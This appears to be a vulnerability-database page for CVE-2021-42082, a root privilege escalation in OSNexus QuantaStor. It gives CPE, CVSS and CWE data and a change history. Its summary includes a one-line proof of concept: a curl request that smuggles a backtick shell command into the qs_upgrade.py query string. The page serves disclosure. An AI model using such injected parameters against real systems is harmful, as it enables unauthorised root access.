CVE-2021-42082

Local users are able to execute scripts under root privileges. POC On the local host run the following command: curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;`whoami`'
Configurations

Configuration 1 (hide)

cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*

History

22 Sep 2025, 07:15

Type Values Removed Values Added
Summary (en) Local users are able to execute scripts under root privileges. (en) Local users are able to execute scripts under root privileges. POC On the local host run the following command: curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;`whoami`'

21 Nov 2024, 06:27

Type Values Removed Values Added
References
  • () https://www.divd.nl/DIVD-2021-00020 -
References () https://csirt.divd.nl/CVE-2021-42082 - Third Party Advisory () https://csirt.divd.nl/CVE-2021-42082 - Third Party Advisory
References () https://www.osnexus.com/products/software-defined-storage - Product () https://www.osnexus.com/products/software-defined-storage - Product
References () https://www.wbsec.nl/osnexus - Third Party Advisory () https://www.wbsec.nl/osnexus - Third Party Advisory

16 Oct 2024, 12:15

Type Values Removed Values Added
References
  • {'url': 'https://www.divd.nl/DIVD-2021-00020', 'tags': ['Broken Link'], 'source': 'csirt@divd.nl'}
  • () https://csirt.divd.nl/DIVD-2021-00020/ -

14 Jul 2023, 14:37

Type Values Removed Values Added
CPE cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*
First Time Osnexus quantastor
Osnexus
References (MISC) https://www.wbsec.nl/osnexus - (MISC) https://www.wbsec.nl/osnexus - Third Party Advisory
References (MISC) https://csirt.divd.nl/CVE-2021-42082 - (MISC) https://csirt.divd.nl/CVE-2021-42082 - Third Party Advisory
References (MISC) https://www.divd.nl/DIVD-2021-00020 - (MISC) https://www.divd.nl/DIVD-2021-00020 - Broken Link
References (MISC) https://www.osnexus.com/products/software-defined-storage - (MISC) https://www.osnexus.com/products/software-defined-storage - Product
CVSS v2 : unknown
v3 : unknown
v2 : unknown
v3 : 7.8
CWE CWE-269

10 Jul 2023, 16:27

Type Values Removed Values Added
New CVE

Information

Published : 2023-07-10 16:15

Updated : 2025-09-22 07:15


NVD link : CVE-2021-42082

Mitre link : CVE-2021-42082

CVE.ORG link : CVE-2021-42082


JSON object : View

Products Affected

osnexus

  • quantastor
CWE
CWE-269

Improper Privilege Management